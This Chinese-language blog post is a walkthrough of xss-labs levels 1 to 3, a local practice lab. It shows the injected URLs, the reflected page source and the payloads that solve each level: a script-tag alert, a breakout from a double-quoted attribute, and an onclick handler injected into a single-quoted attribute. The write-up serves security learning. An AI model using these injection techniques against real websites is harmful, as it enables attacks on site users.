首页 > 其他分享 >xss-labs level 1-3 解题过程

xss-labs level 1-3 解题过程

时间:2023-11-01 14:24:09浏览次数:37  
标签:xss level alert labs 源码 onclick payload

level 1

过程

网页中并没有输入框,观察URL发现name=test,尝试在此进行注入
http://127.0.0.1:82/level1.php?name=<script>alert(1)</script>

过关

payload

<script>alert(1)</script>

level 2

过程

输入框先尝试输入<script>alert(1)</script>无反应

观察源码:
<input name=keyword value="<script>alert(1)</script>">

发现需要闭合,输入"><script>alert(1)</script><"

过关

payload

"><script>alert(1)</script><"

level 3

过程

一样先尝试<script>alert(1)</script>

观察源码:
<input name=keyword value='&lt;script&gt;alert(1)&lt;/script&gt;'>

发现<>被转义了,无法构造标签,于是改变思路,在源码中的input元素中使用onclick参数来达到点击弹窗的效果:
onclick='alert(1)'

同样需要进行闭合

payload

' onclick='alert(1)

标签:xss,level,alert,labs,源码,onclick,payload
From: https://www.cnblogs.com/dddon/p/17798217.html

相关文章

  • xss注入
    xss注入基本类型:反射型、存储型、DOM型js事件:HTML事件参考手册(w3school.com.cn)反射型xss特点:仅执行一次攻击方式:攻击者将含有xss恶意代码的链接发送给用户,当用户访问链接时,服务器接收用户请求(如果服务器没用进行检查),把带有xss代码的数据发送给用户浏览器,浏览器解析xss......
  • 【idea】提示 language level 5 的解决方案
     当我们使用泛型或者JDK1.5之后的特性的时候,idea如果 languagelevel5的解决方案,那么,只要在maven pom.xml手动指定插件版本就行。<build><plugins><plugin><groupId>org.apache.maven.plugins</groupId><artifactI......
  • [WEB安全] XSS攻击防御 Vue
    一、概念XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、Flash或者甚至是普通的HTML。攻击成功后,攻击者可......
  • pikachu靶场XSS篇
    一、XSS简介XSS全称:跨站脚本(CrossSiteScripting),为了不和层叠样式表(CascadingStyleSheets)的缩写CSS混合,所以改名为XSS;攻击者会向web页面(input表单、URL、留言版等位置)插入恶意JavaScript代码,导致管理员/用户访问时触发,从而达到攻击者的目的。二、XSS原理服务器对用户......
  • Sqli-labs靶场搭建教程
    sqli-labs靶场环境搭建1.官网下载靶场的压缩文件2.下载phpstudyWindows版phpstudy下载-小皮面板(phpstudy)(xp.cn)3.打开phpstudy的根目录,把下载好的压缩文件解压到相应的根目录下4.修改sql-connections中的db-creds.inc文件中的数据库密码5.启动apache和mysql......
  • SharePoint 2019开发:如何通过脚本来变更SharePoint Group的 Permission Level
    Blog链接:https://blog.51cto.com/13969817很多企业出于安全管理需要,ITadmin需要根据SecurityPolicy或者审计要求定期批量的修改SharePoint权限,比如添加或者删除某个用户,或者更换某个Group的Permissionlevel等等,如果单纯的修改一个网站,那么我们可以直接到SiteSettings的Permiss......
  • 逆向通达信Level-2 续七 (调试WebView)
    通过窗口找WebView,打开DevTool调试 在WebView hack入控制台。那个,我已经打开了DevTool,算了。 通过pad面板找WebView。 ......
  • shardingdb:支持分片和并发读写的 GoLevelDB
    概述shardingdb是一个开源包,旨在为GoLevelDB增加分片和并发读写功能。它可以作为LevelDB的替代品,方便地集成到现有项目中。本博客将介绍shardingdb及其功能,并介绍如何在您的项目中使用它。特点-分片支持:shardingdb使您能够将数据分布在多个LevelDB实例中,提高性能和可扩......
  • 'main' attribute cannot be used in a module that contains top-level code 问题解
    核心是@main注解在main.swift文件中,可以重新命名下参考资料https://stackoverflow.com/questions/73431031/swift-cli-app-main-attribute-cannot-be-used-in-a-module-that-contains-top-leve......
  • XSS on事件触发方式
    ⑭.₨短链网址on触发方式onafterprint:在用户完成打印操作后触发。onanimationend:在元素的CSS动画完成时触发。onanimationiteration:在元素的CSS动画重复播放时触发。onanimationstart:在元素的CSS动画开始时触发。onauxclick:在用户使用辅助输入设备(例如鼠标上的侧键)点......